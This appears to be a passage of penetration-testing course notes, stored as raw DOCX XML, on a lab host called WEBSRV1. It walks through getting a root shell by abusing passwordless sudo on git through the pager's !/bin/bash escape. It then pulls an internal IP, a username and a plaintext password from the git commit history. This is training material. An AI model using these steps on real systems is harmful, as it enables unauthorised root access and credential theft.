              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image378.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId1102"/>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325C">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">For context, we found that we can use sudo command on /usr/bin/git </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">without password (using sudo -l) </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000325D">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000325E">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The most promising vector at the moment is to abuse the sudo command /usr/bin/git because we don't have to enter a password. Most commands that run with sudo can be abused to obtain an interactive shell with elevated privileges.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000325F">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003260">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">To find potential abuses when a binary such as git is allowed to run with sudo, we can consult GTFOBins. On this page, we enter git in the search bar and select it in the list. Then, let's scroll down until we reach the Sudo section:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003261">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003262">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="2057400"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="23" name="image25.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image25.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId1103"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="2057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263">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003264">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure 7 shows two of the five potential abuse vectors to elevate privileges via git with sudo privileges. Let's try the first one by setting an environment variable that executes when launching the help menu.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003265">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003266">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="889000"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="147" name="image137.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image137.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId1104"/>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3267">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003268">
      <w:pPr>
        <w:spacing w:after="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Unfortunately, the output states that we are not allowed to set an environment variable.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003269">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Next, let's try the second abuse vector. This command opens the help menu in the default</w:t>
      </w:r>
      <w:hyperlink r:id="rId1105">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink r:id="rId1106">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:i w:val="1"/>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">pager</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. On Linux, one of the most popular pagers is </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">less</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. The commands to navigate the pager are similar to </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">vi</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> and can be used to execute code in the context of the user account that launched the pager.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000326A">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="825500"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="550" name="image542.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image542.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId1107"/>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326B">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000326C">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">To execute code through the pager, we can enter </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">!</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> followed by a command or path to an executable file. As Figure 7 shows, we can enter a path to a shell. Let's use </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/bin/bash</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> to obtain an interactive shell.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000326D">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000326E">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="1790700"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="437" name="image433.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image433.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId110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326F">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003270">
      <w:pPr>
        <w:spacing w:after="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Nice! We successfully elevated our privileges on WEBSRV1.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003271">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Armed with </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">root</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> privileges, we'll continue enumerating the system. Before doing so, let's search the Git repository for sensitive information first.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003272">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">To do so, we'll change our current directory to the Git repository. We previously found </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/srv/www/wordpress/.git</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> which means </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/srv/www/wordpress</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> is a git repo</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003273">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Then, we can use </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">git status</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> to display the state of the Git working directory and </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">git log</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> to show the commit history. We can find these on</w:t>
      </w:r>
      <w:hyperlink r:id="rId1109">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink r:id="rId1110">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:i w:val="1"/>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Git's Reference page</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003274">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003275">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="3403600"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="12" name="image2.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image2.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId111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3276">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003277">
      <w:pPr>
        <w:spacing w:after="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Listing 27 shows that there are two commits in the repository. One is labeled as </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">initial commit</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> and one as </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Removed staging script and internal network access</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. That's quite interesting as it indicates that the machine previously had access to the internal network. In addition, the first commit may contain a staging script that was removed.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003278">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We could switch back to a specific commit by using </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">git checkout</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> and a commit hash. However, this could break the functionality of the web application and potentially disrupt the client's day to day operations.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003279">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">A better approach is to use </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">git show</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, which shows differences between commits. In our case, we'll supply the commit hash of the latest commit to the command as we are interested in the changes after the first commit.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000327A">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="3619500"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="444" name="image425.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image425.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId111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327B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="509"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This reveals:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000327C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="509"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Internal IP (192.168.50.245)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000327D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="509"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Username (john)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000327E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="509"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Password (dqsTwTpZPn#nL)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000327F">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003280">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Nice! By displaying the differences between commits, we identified another set of credentials. The approach of automating tasks with</w:t>
      </w:r>
      <w:hyperlink r:id="rId1113">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink r:id="rId1114">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:i w:val="1"/>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">sshpass</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> is commonly used to provide a password in a non-interactive way for scripts.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003281">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003282">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
